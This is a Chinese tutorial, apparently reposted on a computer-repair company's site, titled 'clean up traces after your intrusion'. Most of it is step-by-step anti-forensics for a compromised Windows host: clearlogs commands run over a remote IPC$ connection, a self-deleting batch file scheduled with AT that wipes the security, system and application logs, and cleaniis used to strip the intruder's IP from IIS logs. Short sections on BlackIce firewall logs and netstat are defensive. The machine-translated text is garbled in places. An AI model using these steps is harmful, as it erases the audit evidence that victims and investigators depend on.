清理你入侵后的痕迹
DNS日记默认位置:%systemroot%\system32\config,默认文件大小512KB,办理员都市改变这个默认大小。宁静日记文件:%systemroot%\system32\config\SecEvent.EVT
系统日记文件:%systemroot%\system32\config\SysEvent.EVT
应用程序日记文件:%systemroot%\system32\config\AppEvent.EVT
FTP日记默认位置:%systemroot%\system32\logfiles\msftpsvc1\,默认每天一个
WWW日记默认位置:%systemroot%\system32\logfiles\w3svc1\,默认每天一个日记
以上日记在注册内外的键: 应用程序日记,宁静日记,系统日记,DNS办事器日记,
它们这些LOG文件在注册表中的:
HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Eventlog
钥匙(表现成功)和锁(表现当用户在做什么时被系统停止)。接连四个锁图标,表现四次失败考核,事件范例是帐户登录和登录、注销失败
怎样删除这些日记: 经过下面,得知日记文件通常有某项办事在后台保护,除了系统日记、宁静日记、应用程序日记等等,它们的办事是Windos2000的要害历程,而且与注册表文件在一块,当Windows2000启动后,启动办事来保护这些文件,以是很难删除.
下面就是很难的宁静日记和系统日记了,守护这些日记的办事是Event Log,试着停掉它! D:\SERVER\system32\LogFiles\W3SVC1>net stop eventlog 这项办事无法担当恳求的"停息" 或"停止" 操作。
怎样清除系统日记.
怎样使用东西清除IIS日记
怎样清除历史和cookie
怎样观察防火墙Blackice的日记
netstat -an 表现的什么意思
===================================
1.系统日记 经过手工很难清除. 这里我们介绍一个东西 clearlog.exe
使用要领:
Usage: clearlogs [\\computername] <-app / -sec / -sys>
-app = 应用程序日记
-sec = 宁静日记
-sys = 系统日记
a. 可以清除远程计算机的日记
** 先用ipc连接上去: net use \\ip\ipc$ 暗码/user:用户名
** 然后开始清除: 要领
clearlogs \\ip -app 这个是清除远程计算机的应用程序日记
clearlogs \\ip -sec 这个是清除远程计算机的宁静日记
clearlogs \\ip -sys 这个是清除远程计算机的系统日记
b.清除本机日记: 要是和远程计算机的不克不及空连接. 那么就必要把这个东西传到远程计算机下面
然后清除. 要领:
clearlogs -app 这个是清除远程计算机的应用程序日记
clearlogs -sec 这个是清除远程计算机的宁静日记
clearlogs -sys 这个是清除远程计算机的系统日记
宁静日记已经被清除.Success: The log has been cleared 成功.
为了更宁静一点.异样你也可以建立一个批处理文件.让主动清除. 做好批处理文件.然后用at下令建立一个筹划任务. 让主动运行. 之后你就可以脱离你的肉鸡了.
例如建立一个 c.bat
rem ============================== 开始
@echo off
clearlogs -app
clearlogs -sec
clearlogs -sys
del clearlogs.exe
del c.bat
exit
rem ============================== 结束
在你的计算机下面测试的时间 可以不要 @echo off 可以显示出来. 你可以看到效果
第一行表现: 运行时不显示窗口
第二行表现: 清除应用程序日记
第三行表现: 清除宁静日记
第四行表现: 清除系统日记
第五行表现: 删除 clearlogs.exe 这个东西
第六行表现: 删除 c.bat 这个批处理文件
第七行表现: 退出
用AT下令. 建立一个筹划任务. 这个下令在原来的教程里面和杂志里面都有. 你可以去看看详细的使用要领
AT 时间 c:\c.bat
之后你就可以宁静脱离了. 这样才更宁静一点.
===================================
2.清除iis日记:
东西:cleaniis.exe
使用要领:
iisantidote
iisantidote
stop opiton will stop iis before clearing the files and restart it after
使用要领解释:
cleaniis.exe iis日记寄存的路径 清除参数
什么意思呢??我来给大家举个例子吧:
cleaniis c:\winnt\system32\logfiles\w3svc1\ 192.168.0.1
这个表现清除log中所有此IP(192.168.0.1)地址的访问记载. -----保举使用这种要领
cleaniis c:\winnt\system32\logfiles\w3svc1\ /shop/admin/
这个表现清除这个目次里面的以是的日记
c:\winnt\system32\logfiles\w3svc1 代表是iis日记的位置(windows nt/2000) 这个路径可以改变
c:\windows\system32\logfiles\w3svc1 代表是iis日记的位置(windows xp/2003) 这个路径可以改变
这个测试表现 在日记里面没有这个ip地址.
我们看一下日记的路径 再来看一下
我们的ip(192.168.0.1)已经没有了.
已经全部清空.
异样这个也可以建立批处理. 要领同下面的那个.
===================================
3.清除历史记载及运行的日记:
cleaner.exe
直接运行就可以了.
===================================
4.观察blackice的日记.
这个中央我们可以清除的看到 防火墙的日记.
这个表现 有人发过去带有病毒的email附件. ip是: 220.184.153.116
tcp_probe_other 表现 经过tcp 扫描 或者使用别的和你建立连接 通信
这个表现经过端口 80 扫描iis
病毒 nimda
这里必要许多的计算机协议知识. 同时也必要对英语有了解
才气更好的分析 要是对英语欠好 你可以装一个金山词霸.
一样平常情况下 我们可以 对一些可以不用管.
一样平常这三种情况 不用去管.
最下面的 critical 这个 可以去存眷一下 . 一样平常是的确有别的计算机扫描或者入侵你的计算机
count 代表次数 intruder 是对方的ip event 是经过什么方法(协议) 扫描或者想入侵的
time表现时间
5.===================================
netstat -an 表现什么意思?
使用这个下令可以观察到和本机的所有的连接.
Proto Local Address Foreign Address State
协议 本地端口及IP地址 远程端口及IP地址 状态
LISTENING 监听状态 表现等候对方连接
ESTABLISHED 正在连接着.
TCP 协议是TCP
UDP 协议是UDP
TCP 192.168.0.10:1115 61.186.97.54:80 ESTABLISHED
这个表现 使用tcp协议 本机ip(192.168.0.10)经过端口:1115 和远程ip(61.186.97.54)端口:80连接
80端口 表现 http 就是你在访问这个网站.
一样平常情况下远程ip的端口: 80 21 8000 这个都是正常的. 要是是别的 就可以看一下你的计算机了.
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
|
评论加载中...
|
